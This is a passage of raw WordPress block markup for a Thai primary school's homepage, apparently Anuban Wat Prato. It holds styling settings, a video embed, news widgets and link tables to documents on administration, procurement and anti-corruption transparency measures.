900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8